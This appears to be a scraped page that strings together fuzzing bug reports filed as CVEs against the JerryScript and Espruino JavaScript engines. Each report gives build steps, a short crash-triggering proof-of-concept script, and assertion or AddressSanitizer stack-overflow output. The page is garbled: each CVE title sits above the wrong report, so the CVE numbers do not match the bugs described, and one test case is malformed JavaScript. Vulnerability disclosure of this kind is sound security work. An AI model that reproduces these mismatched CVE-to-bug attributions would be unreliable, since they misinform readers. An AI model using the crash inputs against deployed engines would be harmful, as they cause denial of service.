CVE-2021-46334: Stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in __interceptor_strcat with ASAN · Issue #760 · Moddable-OpenSource/moddable

There is an Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at /parser/js/js-parser-expr.c(parser_parse_class_body) in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    function assert(a, b) {
      if (a != b)
        throw "FAIL";
    }
    
    function JSEtest(script) {
      try {
        eval(script);
      } catch (e) {
        return e;
      }
    }
    
    assert(JSEtest("class C1 { async;constructor() { } }"), "SyntaxError: Cannot declare an async method named 'constructor'.");
    assert(JSEtest("class C1 { *constructor() { } }"), "SyntaxError: Cannot declare a generator function named 'constructor'.");
    assert(JSEtest("class C1 { async *constructor() { } }"), "SyntaxError: Cannot declare an async generator method named 'constructor'.");
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'opts & PARSER\_CLASS\_LITERAL\_CTOR\_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser\_parse\_class\_body):656.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    31519 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46336: Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. · Issue #4927 · jerryscript-project/jerryscript

There is an Assertion 'page_p != NULL' failed at /parser/js/js-parser-mem.c(parser_list_get) in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    var stringSet;
    
    class JSEtest {
      get #test262() { return 'get string'; }
      set #test262(param) { stringSet = param; }
    
      getPrivateReference() {
        return this.#test262;
      }
    
      setPrivateReference(value) {function    this.#test262 = value;
      }
    };
    
    var inst = new JSEtest();
    assert.sameValue(inst.getPrivateReference(), 'get string');
    inst.setPrivateReference('set string');
    assert.sameValue(stringSet, 'set string');
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'page\_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser\_list\_get):279.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    36899 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46337: Assertion 'page_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser_list_get):279.  · Issue #4930 · jerryscript-project/jerryscript

Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.

**Espruino revision**

Commit: 53108085  
Version: 2v11.251

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CCFLAGS='\-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

**Test case**

var result \= (new Array(64)."a", "b",expected,actual(new Array(64))).concat(\["H"\]);
var value \= result\[0\];
if (value !== void 0)
    throw "Error" + value;

**Execution & Output**

./Espruino/espruino poc.js

=================================================================
=========ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffef778ec61 at pc 0x55e21c41efe8 bp 0x7ffef778eb70 sp 0x7ffef778eb60
READ of size 1 at 0x7ffef778ec61 thread T0
    #0 0x55e21c41efe7 in jsvNewFromString src/jsvar.c:910
    #1 0x55e21c456e0c in jsvAddNamedChild src/jsvar.c:2581
    #2 0x55e21c52d165 in jspeAddNamedFunctionParameter src/jsparse.c:1442
    #3 0x55e21c5540ee in jspeExpressionOrArrowFunction src/jsparse.c:1469
    #4 0x55e21c555c06 in jspeFactor src/jsparse.c:1622
    #5 0x55e21c53891f in jspeFactorFunctionCall src/jsparse.c:1160
    #6 0x55e21c539f38 in jspePostfixExpression src/jsparse.c:1786
    #7 0x55e21c541192 in jspeBinaryExpression src/jsparse.c:1955
    #8 0x55e21c541192 in jspeConditionalExpression src/jsparse.c:1991
    #9 0x55e21c541192 in jspeAssignmentExpression src/jsparse.c:2050
    #10 0x55e21c541192 in jspeStatementVar src/jsparse.c:2165
    #11 0x55e21c54b6d4 in jspeBlockOrStatement src/jsparse.c:2124
    #12 0x55e21c54da1e in jspParse src/jsparse.c:2136
    #13 0x55e21c55c3ea in jspEvaluateVar src/jsparse.c:2996
    #14 0x55e21c55c3ea in jspEvaluate src/jsparse.c:3026
    #15 0x55e21c36c025 in main targets/linux/main.c:460
    #16 0x7fa0f5814bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #17 0x55e21c36fbc9 in \_start (/root/Espruino/espruino+0x4ebc9)
Address 0x7ffef778ec61 is located in stack of thread T0 at offset 97 in frame
    #0 0x55e21c52cedf in jspeAddNamedFunctionParameter src/jsparse.c:1437
This frame has 1 object(s):
    \[32, 97) 'buf' <== Memory access at offset 97 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString
Shadow bytes around the buggy address:
    0x10005eee9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =\>0x10005eee9d80: f1 f1 f1 f1 00 00 00 00 00 00 00 00\[01\]f2 f2 f2
    0x10005eee9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10005eee9da0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
    0x10005eee9db0: 00 00 00 00 00 00 00 f2 00 00 00 00 00 00 00 00
    0x10005eee9dc0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
    0x10005eee9dd0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
=========ABORTING

Tag

#ubuntu